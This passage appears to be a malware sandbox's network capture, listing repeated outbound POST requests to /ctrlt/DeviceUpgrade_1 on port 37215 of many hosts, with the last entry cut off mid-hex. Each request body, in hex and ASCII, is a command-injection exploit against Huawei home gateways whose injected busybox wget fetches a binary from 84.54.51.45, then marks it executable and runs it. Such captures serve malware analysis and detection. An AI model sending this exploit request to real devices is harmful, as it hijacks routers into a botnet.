                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1803192.168.2.154090041.93.94.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465436935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1804192.168.2.154704441.156.140.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465436935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1805192.168.2.153413041.202.201.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465451002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1806192.168.2.153385241.96.159.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465471029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1807192.168.2.155139241.205.48.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465491056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1808192.168.2.155670841.146.247.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465491056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1809192.168.2.154820041.194.226.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465517998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1810192.168.2.155432641.102.246.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465531111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1811192.168.2.154407841.102.29.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465574026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1812192.168.2.155232441.254.142.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465574026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 